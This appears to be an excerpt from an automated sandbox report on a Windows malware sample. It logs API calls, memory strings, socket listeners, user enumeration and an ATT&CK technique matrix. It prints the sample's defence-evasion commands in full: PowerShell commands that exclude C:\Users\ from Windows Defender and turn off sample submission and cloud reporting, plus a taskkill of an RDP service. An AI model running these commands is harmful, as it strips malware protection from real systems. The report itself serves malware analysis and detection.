Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704893DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,11_2_00007FF704893DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708871CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF708871CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFAB31F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFAB31F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\user\Desktop\ET5.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: main.exe, 00000016.00000002.4540383274.000001B9FFCDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll80
Source: ET5.exe, 00000002.00000002.4527793606.0000000001697000.00000004.00000020.00020000.00000000.sdmp, j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415604789.0000029EDA313000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2357216162.000001B9FFCFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ET5.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,11_2_00007FF70489FF1F
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048945D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,11_2_00007FF7048945D5
Source: C:\Users\user\Desktop\ET5.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704891131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,11_2_00007FF704891131
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048A05D9 SetUnhandledExceptionFilter,11_2_00007FF7048A05D9
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048AB6B8 QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,11_2_00007FF7048AB6B8
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF7048AB668 IsDBCSLeadByteEx,OpenProcess,QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,WideCharToMultiByte,11_2_00007FF7048AB668
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708871131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,22_2_00007FF708871131

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Modifies Windows Defender protection settings
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF70489292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,11_2_00007FF70489292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704896FD5 GetSystemTimeAsFileTime,11_2_00007FF704896FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: hstmhco83f64lehv4q0wbzqj3o.exe, 0000000B.00000002.2315787188.0000021576038000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91709A8 listen,22_2_00007FF8B91709A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915E549 listen,22_2_00007FF8B915E549
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91A3A00 listen,22_2_00007FF8B91A3A00
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91901A9 listen,22_2_00007FF8B91901A9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA50CC19 listen,22_2_00007FF8BA50CC19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA50240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BA50240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA51F900 listen,22_2_00007FF8BA51F900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFAB15FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFAB15FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFACB820 listen,22_2_00007FF8BFACB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB6E900 listen,22_2_00007FF8BFB6E900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8E2B9 listen,22_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFBA0920 listen,22_2_00007FF8BFBA0920

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		1
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		21
Disable or Modify Tools		1
Network Sniffing		1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API		1
DLL Side-Loading		2
Valid Accounts		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop ProtocolData from Removable Media1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		1
Create Account		2
Access Token Manipulation		3
Obfuscated Files or Information		Security Account Manager1
System Service Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution		2
Valid Accounts		4
Windows Service		1
Timestomp		NTDS3
File and Directory Discovery		Distributed Component Object ModelInput Capture1
Proxy		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd4
Windows Service		11
Process Injection		1
DLL Side-Loading		LSA Secrets1
